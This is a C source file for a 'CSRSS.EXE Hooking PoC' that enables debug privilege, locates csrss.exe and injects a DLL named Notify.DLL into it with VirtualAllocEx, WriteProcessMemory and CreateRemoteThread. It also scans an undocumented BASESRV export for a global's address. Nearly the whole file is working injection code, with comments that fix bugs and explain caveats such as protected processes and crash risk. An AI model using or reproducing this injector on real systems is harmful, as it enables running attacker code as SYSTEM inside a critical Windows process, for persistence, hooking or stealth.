CsrssHook.c in csrss_hooker-startgo


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h>
#include <Psapi.h>
#pragma comment(lib, "Psapi.lib")

/* Absolute operand recovered from the first A3 (MOV [imm32],EAX) byte in
 * BASESRV!BaseSetProcessCreateNotify (see CsrGetCsrssProcessNotifyRoutine).
 * main() only prints it; nothing else in this file reads it. */
LPVOID Addr = NULL;
/* PID of the csrss.exe instance chosen by GetCsrssProcessId(); read by CheckDLL(). */
DWORD CsrssPID = 0;

/* Forward declarations; the definitions follow main(). */
VOID CheckDLL(VOID);                          /* exit(1) if notify.dll is already loaded in csrss */
LPVOID CsrGetCsrssProcessNotifyRoutine(VOID); /* byte-scan of BASESRV for a global's address */
VOID GetDebugPrivilege(VOID);                 /* RtlAdjustPrivilege(20 = SE_DEBUG_PRIVILEGE) */
DWORD GetCsrssProcessId(VOID);                /* first PID whose image base name is csrss.exe */
VOID MakeDirectoryPathFromPath(LPSTR Path);   /* truncate Path in place at its last '\\' */

/* One record per process as returned by ZwQuerySystemInformation(5); records are
 * chained by NextEntryOffset and the last one carries NextEntryOffset == 0.
 * The field layout matches the public winternl.h declaration of this undocumented
 * structure. Only NextEntryOffset and UniqueProcessId are read in this file, so the
 * Reserved* members merely have to occupy the right number of bytes. The image name
 * is not exposed by this layout, which is why GetCsrssProcessId() opens every
 * process and asks Psapi for its base name instead. */
typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    BYTE Reserved1[48];
    PVOID Reserved2[3];
    HANDLE UniqueProcessId;
    PVOID Reserved3;
    ULONG HandleCount;
    BYTE Reserved4[4];
    PVOID Reserved5[11];
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER Reserved6[6];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

/* ZwQuerySystemInformation(SystemInformationClass, Buffer, Length, ReturnLength) -> NTSTATUS. */
typedef LONG (WINAPI *QUERYPROC)(LONG,PVOID,ULONG,PULONG);

/* Returned while Buffer is too small; ReturnLength then holds the size that was needed. */
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004L
/* Information class 5, called SystemProcessInformation in newer headers. */
#define SystemProcessesAndThreadsInformation 5

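/* Entry point: locate csrss.exe, then make it LoadLibraryA() the Notify.DLL that
 * sits next to this executable, via CreateRemoteThread.
 *
 * Preconditions a practitioner should know about:
 *  - Needs SeDebugPrivilege (administrator). On Windows 8.1 and later csrss runs as a
 *    protected process, so the PROCESS_ALL_ACCESS OpenProcess below fails regardless.
 *  - Injector, csrss and Notify.DLL must share bitness: the LoadLibraryA address is
 *    taken from our own kernel32 and assumed to be identical inside csrss.
 *  - Whatever file sits at "<exe dir>\Notify.DLL" is loaded into csrss as SYSTEM. If
 *    that directory is writable by less-privileged users this is a privilege
 *    escalation path in its own right.
 *  - A fault inside csrss bugchecks the machine (CRITICAL_OBJECT_TERMINATION).
 *
 * Returns 0 on success, 1 on any failure (helpers may also exit(1) directly).
 */
int main(int argc, char **argv)
{
	HANDLE hProcess, hThread;
	char FileName[260] = {0};
	const char DllName[] = "\\Notify.DLL";
	DWORD WrittenBytes = 0;
	DWORD PathLen = 0;
	DWORD RemoteModule = 0;
	LPVOID lpStr = NULL;
	LPVOID LoadLibraryAddr = NULL;
	DWORD TID = 0;

	(void)argc;
	(void)argv;

	printf("==============================================\n");
	printf("[+] CSRSS.EXE Hooking PoC Code\n");
	printf("[+] Made By 荐切里捞 (ljm92201@paran.com, startgoora)\n");
	printf("==============================================\n\n");

	/* Heuristic x86 byte scan of BASESRV!BaseSetProcessCreateNotify. */
	Addr = CsrGetCsrssProcessNotifyRoutine();
	if(!Addr)
	{
		printf("[+] Error: Can't found address Notify Routine!? Is WinNT?\n");
		return 1;
	}

	/* The address is only reported; nothing below uses it. (The original comment
	 * here was mojibaked Korean and could not be recovered.) %p replaces the
	 * original %08X, which mismatched the pointer argument. */
	printf("[+] Found Address! %p\n", Addr);

	printf("[+] Enabling debug privilege...");
	GetDebugPrivilege();

	printf("[+] Getting CSRSS.EXE Process Id...");
	CsrssPID = GetCsrssProcessId();

	/* Full access to csrss: requires SeDebugPrivilege and an unprotected csrss. */
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, CsrssPID);
	if(!hProcess)
	{
		printf("[+] OpenProcess() Failed! (GetLastError: %x)\n", GetLastError());
		return 1;
	}

	/* Build "<directory of this exe>\Notify.DLL". GetModuleFileName truncates
	 * silently when the buffer is too small (and older systems then do not
	 * NUL-terminate), so the return value is checked and room for the suffix is
	 * verified before strcat; the original strcat was unbounded. */
	PathLen = GetModuleFileName(NULL, FileName, sizeof(FileName));
	if(PathLen == 0 || PathLen >= sizeof(FileName))
	{
		printf("[+] GetModuleFileName() Failed! (GetLastError: %x)\n", GetLastError());
		CloseHandle(hProcess);
		return 1;
	}
	MakeDirectoryPathFromPath(FileName);
	if(strlen(FileName) + strlen(DllName) >= sizeof(FileName))
	{
		printf("[+] DLL path is too long.\n");
		CloseHandle(hProcess);
		return 1;
	}
	strcat(FileName, DllName);

	/* Only a plainly missing file is rejected here. Any other failure (bad path,
	 * access denied for *this* account) is left to csrss's own LoadLibraryA, since
	 * csrss loads the file with SYSTEM rights, not ours. */
	if(GetFileAttributes(FileName) == -1)
	{
		if(GetLastError() == ERROR_FILE_NOT_FOUND)
		{
			printf("[+] Notify.DLL is missing.\n");
			CloseHandle(hProcess);
			return 1;
		}
	}

	/* Refuse to inject twice (exits the process if notify.dll is already loaded). */
	CheckDLL();

	/* Same-bitness assumption: kernel32 is mapped at the same base in csrss. */
	LoadLibraryAddr = (LPVOID) GetProcAddress(GetModuleHandle("KERNEL32.DLL"), "LoadLibraryA");
	if(!LoadLibraryAddr)
	{
		printf("[+] Can't resolve LoadLibraryA.\n");
		CloseHandle(hProcess);
		return 1;
	}

	/* Copy the DLL path into csrss as the LoadLibraryA argument. This page is never
	 * freed (VirtualFreeEx); the original leaked it too, and the DLL keeps running
	 * inside csrss after we exit anyway. */
	lpStr = VirtualAllocEx(hProcess, NULL, strlen(FileName)+1, MEM_COMMIT, PAGE_READWRITE);
	if(!lpStr)
	{
		printf("[+] Remote Memory Allocation is failed.\n");
		CloseHandle(hProcess);
		return 1;
	}

	/* The original ignored the BOOL and accepted a write one byte short of the
	 * terminator; require the whole NUL-terminated string to land. */
	if(!WriteProcessMemory(hProcess, lpStr, FileName, strlen(FileName)+1, &WrittenBytes)
	   || WrittenBytes != strlen(FileName)+1)
	{
		printf("[+] WriteProcessMemory failed.\n");
		CloseHandle(hProcess);
		return 1;
	}

	hThread = CreateRemoteThread(hProcess,
					   NULL,
					   0,
					   (LPTHREAD_START_ROUTINE) LoadLibraryAddr,
					   lpStr,
					   0,
					   &TID);
	if(!hThread)
	{
		printf("[+] DLL Injection Failed.\n");
		CloseHandle(hProcess);
		return 1;
	}

	if(WaitForSingleObject(hThread, 3000) == WAIT_TIMEOUT)
	{
		printf("[+] DLL Injection Failed.\n");
		/* Kept from the original: killing a thread that may still hold csrss's
		 * loader lock is the most dangerous line in this file and can wedge or
		 * crash csrss. A practitioner would rather leave the thread alone. */
		TerminateThread(hThread, 0);
		CloseHandle(hThread);
		CloseHandle(hProcess);
		return 1;
	}

	/* The thread's exit code is LoadLibraryA's return value, i.e. the HMODULE
	 * truncated to 32 bits. Zero means csrss could not load the DLL at all, which
	 * the original still reported as a success. (On x64 a module whose low 32 bits
	 * are zero would be misreported as a failure; that is unlikely but possible.) */
	if(!GetExitCodeThread(hThread, &RemoteModule) || RemoteModule == 0)
	{
		printf("[+] DLL Injection Failed. (LoadLibraryA returned NULL)\n");
		CloseHandle(hThread);
		CloseHandle(hProcess);
		return 1;
	}

	printf("[+] DLL Injection Success.\n");
	CloseHandle(hThread);
	CloseHandle(hProcess);
	return 0;
}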

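/* Exit the injector if a module whose base name is notify.dll is already loaded in
 * the csrss process identified by the global CsrssPID.
 *
 * Caveats for whoever relies on this guard:
 *  - The match is on the base name only; any module called notify.dll, whatever its
 *    path, counts as "already injected".
 *  - TH32CS_SNAPMODULE on a foreign process needs the same access OpenProcess needs,
 *    fails from a 32-bit injector against a 64-bit target (ERROR_PARTIAL_COPY), and
 *    can transiently fail with ERROR_BAD_LENGTH, which the documentation says to
 *    retry. None of that is retried here; a failed snapshot is reported and the
 *    check is skipped, where the original skipped it silently and let the caller
 *    proceed to call LoadLibraryA in csrss a second time.
 */
VOID CheckDLL(VOID)
{
	HANDLE hSnapShot = NULL;
	MODULEENTRY32 me;
	BOOL HaveModule = FALSE;

	hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, CsrssPID);
	if(hSnapShot == INVALID_HANDLE_VALUE)
	{
		printf("[+] Warning: can't snapshot csrss modules; duplicate-injection check skipped.\n");
		return;
	}

	memset(&me, 0, sizeof(me));
	me.dwSize = sizeof(me);  /* Module32First rejects the call without this */
	for(HaveModule = Module32First(hSnapShot, &me);
	    HaveModule;
	    HaveModule = Module32Next(hSnapShot, &me))
	{
		if(strcmpi(me.szModule, "notify.dll") == 0)
		{
			printf("[+] ERROR! Already Injected.");
			CloseHandle(hSnapShot);
			exit(1);
		}
	}
	CloseHandle(hSnapShot);
}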

/* Truncate Path in place at its last backslash, turning "C:\dir\file.exe" into
 * "C:\dir". A string without a backslash (including "") is left untouched. Path must
 * be a writable NUL-terminated string; only '\\' is recognised, as the Windows path
 * returned by GetModuleFileName uses. (LPSTR is char *, spelled out here.) */
void MakeDirectoryPathFromPath(char *Path)
{
	char *LastSep = strrchr(Path, '\\');
	if(LastSep != NULL)
	{
		*LastSep = '\0';
	}
}

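/* Return the PID of the first process whose image base name is csrss.exe, found by
 * walking ZwQuerySystemInformation(SystemProcessInformation) and asking Psapi for
 * each process's base name. Prints " Success!"/" Failed!" fragments to continue the
 * caller's progress line and exit(1)s on every failure, so it only ever returns a PID.
 *
 * Fixes over the original: the buffer-size retry now loops until the snapshot fits
 * (the list can grow between calls; one retry then "unknown reason" before), the last
 * record in the list is examined (the old loop tested NextEntryOffset before looking
 * at the record, so the final process was never checked), the process handle and the
 * buffer are released on the success path, and the PID is printed as an integer
 * rather than passing a HANDLE to %d.
 *
 * Caveats: the match is by image base name only, so it picks the first process called
 * csrss.exe whatever its path, and on a system with several sessions there is one
 * csrss.exe per session; opening a process needs SeDebugPrivilege for csrss, and a
 * process that cannot be opened is skipped silently, which is why a failed
 * GetDebugPrivilege() typically ends in " Failed! CSRSS.exe is missing.".
 */
DWORD GetCsrssProcessId(VOID)
{
	HMODULE hNtDLL = NULL;
	HANDLE ProcessHandle = NULL;
	QUERYPROC QueryProc = NULL;
	LPVOID Buffer = NULL;
	LPVOID NewBuffer = NULL;
	PCHAR CurrentPtr = NULL;
	PSYSTEM_PROCESS_INFORMATION Entry = NULL;
	DWORD Needed = 0;
	DWORD Size = 0;
	DWORD Pid = 0;
	LONG status = 0;
	CHAR ModuleName[255] = {0};

	Size = sizeof(SYSTEM_PROCESS_INFORMATION);
	Buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Size);
	if(!Buffer)
	{
		printf(" Failed! Memory Allocation is failed.\n");
		exit(1); return 0;
	}

	hNtDLL = GetModuleHandle("NTDLL.DLL");
	QueryProc = (QUERYPROC)GetProcAddress(hNtDLL, "ZwQuerySystemInformation");
	if(!QueryProc){
		printf(" Failed! ZwQuerySystemInformation is not supported.\n");
		exit(1); return 0;
	}

	/* Grow the buffer until the whole process list fits. The returned length is
	 * only a hint (it may be 0, or stale by the next call), so fall back to adding
	 * one record's worth when it does not help. */
	for(;;)
	{
		Needed = 0;
		status = QueryProc(SystemProcessesAndThreadsInformation, Buffer, Size, &Needed);
		if(status != STATUS_INFO_LENGTH_MISMATCH)
			break;

		Size = (Needed > Size) ? Needed : Size + sizeof(SYSTEM_PROCESS_INFORMATION);
		NewBuffer = HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Buffer, Size);
		if(!NewBuffer){
			printf(" Failed! Memory Reallocation is failed.\n");
			exit(1); return 0;
		}
		Buffer = NewBuffer;
	}

	if(status)
	{
		HeapFree(GetProcessHeap(), 0, Buffer);
		printf(" Failed! ZwQuerySystemInformation failed in unknown reason (NTSTATUS %08X)\n", status);
		exit(1); return 0;
	}

	/* Examine every record, including the last one (NextEntryOffset == 0). */
	CurrentPtr = (PCHAR) Buffer;
	for(;;)
	{
		Entry = (PSYSTEM_PROCESS_INFORMATION) CurrentPtr;
		Pid = (DWORD)(size_t) Entry->UniqueProcessId;

		ProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, Pid);
		if(ProcessHandle)
		{
			/* On failure GetModuleBaseName leaves ModuleName empty and the compare misses. */
			memset(ModuleName, 0, sizeof(ModuleName));
			GetModuleBaseName(ProcessHandle, NULL, ModuleName, sizeof(ModuleName));
			CloseHandle(ProcessHandle);

			if(strcmpi(ModuleName, "csrss.exe") == 0)
			{
				HeapFree(GetProcessHeap(), 0, Buffer);
				printf(" Success! (PID: %lu)\n", (unsigned long) Pid);
				return Pid;
			}
		}

		if(Entry->NextEntryOffset == 0)
			break;
		CurrentPtr += Entry->NextEntryOffset;
	}

	HeapFree(GetProcessHeap(), 0, Buffer);
	printf(" Failed! CSRSS.exe is missing.\n");
	exit(1);
	return 0;
}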

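/* Enable SeDebugPrivilege (privilege 20) in the current process token through the
 * undocumented ntdll!RtlAdjustPrivilege. Prints a " Success"/" Failed!" fragment to
 * continue the caller's progress line and exit(1)s on failure.
 *
 * The privilege can only be enabled if the token already holds it, i.e. the injector
 * runs as an administrator. The original discarded the NTSTATUS and printed "Success"
 * unconditionally, so a STATUS_PRIVILEGE_NOT_HELD (0xC0000061) surfaced only later as
 * an OpenProcess failure on csrss; the status is now checked.
 */
VOID GetDebugPrivilege(VOID)
{
	HMODULE hNtDLL = NULL;
	LPVOID PrivProc = NULL;
	DWORD Dummy = 0;
	long Status = 0;

	hNtDLL = GetModuleHandle("NTDLL.DLL");
	if(!hNtDLL)
	{
		printf(" Failed! Is WinNT?\n");
		exit(1); return;
	}

	PrivProc = (LPVOID) GetProcAddress(hNtDLL, "RtlAdjustPrivilege");
	if(!PrivProc)
	{
		printf(" Failed! RtlAdjustPrivilege is not supported.\n");
		exit(1); return;
	}

	/* NTSTATUS RtlAdjustPrivilege(ULONG Privilege, BOOLEAN Enable,
	 *                             BOOLEAN CurrentThread, PBOOLEAN WasEnabled).
	 * The last argument is really a PBOOLEAN; a DWORD is passed as in the original,
	 * which is merely oversized. Enable=1, CurrentThread=0 adjusts the process token. */
	Status = ((long (WINAPI*)(DWORD,BOOL,BOOL,LPDWORD))PrivProc)(20, 1, 0, &Dummy);
	if(Status != 0)
	{
		printf(" Failed! RtlAdjustPrivilege returned NTSTATUS %08lX (not running as administrator?)\n",
		       (unsigned long) Status);
		exit(1); return;
	}

	printf(" Success\n");
}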

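/* Recover the address of the global that BASESRV!BaseSetProcessCreateNotify stores
 * into, by scanning the export's first 64 bytes for an A3 opcode (x86 encoding of
 * MOV [moffs32],EAX) and returning its absolute operand. Returns NULL if BASESRV.DLL
 * or the export cannot be found or no A3 byte occurs in the window.
 *
 * This is a byte heuristic, not a disassembly: an A3 inside an earlier instruction's
 * immediate or displacement yields garbage, and an x64 build, which would store
 * through a RIP-relative MOV, is unlikely to match at all. BASESRV.DLL is csrss's
 * Win32 server DLL; LoadLibrary() here runs its DllMain in *this* process solely so
 * GetProcAddress can resolve the export, and the bytes read are our own mapping's,
 * not csrss's. main() only prints the result.
 *
 * Fix over the original: the loop ran i up to 63 and then read sizeof(LPVOID) bytes
 * from NotifyProc + 64, past the window it meant to inspect; the bound now keeps the
 * whole operand inside the 64 bytes.
 */
LPVOID CsrGetCsrssProcessNotifyRoutine(VOID)
{
	HMODULE hBaseSrv = NULL;
	PCHAR NotifyProc = NULL;
	int i = 0;

	hBaseSrv = GetModuleHandle("BASESRV.DLL");
	if(!hBaseSrv){
		hBaseSrv = LoadLibrary("BASESRV.DLL");
		if(!hBaseSrv) return NULL;
	}

	/* Undocumented export; nothing guarantees its prologue shape across builds. */
	NotifyProc = (PCHAR)GetProcAddress(hBaseSrv, "BaseSetProcessCreateNotify");
	if(!NotifyProc)	return NULL;

	for(i = 0; i + 1 + (int) sizeof(LPVOID) <= 64; i++)
	{
		/* Compare as an unsigned byte; CHAR may be signed, (CHAR)0xA3 relied on that. */
		if((unsigned char) NotifyProc[i] == 0xA3) /* MOV DWORD PTR [XXXXXXXX], EAX */
		{
			return *(LPVOID *)(NotifyProc + i + 1);
		}
	}
	return NULL;
}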
Project Files

NameSizeDate
 CsrssHook.exe32.00 kB04-17-08 22:02
 Notify.dll40.00 kB01-18-08 10:03
 CsrssHook.c7.76 kB04-17-08 22:01
 CsrssHook.dsp3.35 kB01-18-08 00:02
 CsrssHook.dsw543.00 B01-18-08 00:02
 CsrssHook.ncb41.00 kB04-17-08 22:02
 CsrssHook.opt52.50 kB04-17-08 22:02
 CsrssHook.plg1.08 kB04-17-08 22:02
 Notify.c1.99 kB01-18-08 10:03
 NotifyDLL.dsp3.99 kB01-18-08 09:48
 NotifyDLL.dsw543.00 B01-18-08 09:33
 NotifyDLL.ncb33.00 kB01-18-08 10:04
 NotifyDLL.opt52.50 kB01-18-08 10:04
 NotifyDLL.plg1.17 kB01-18-08 10:03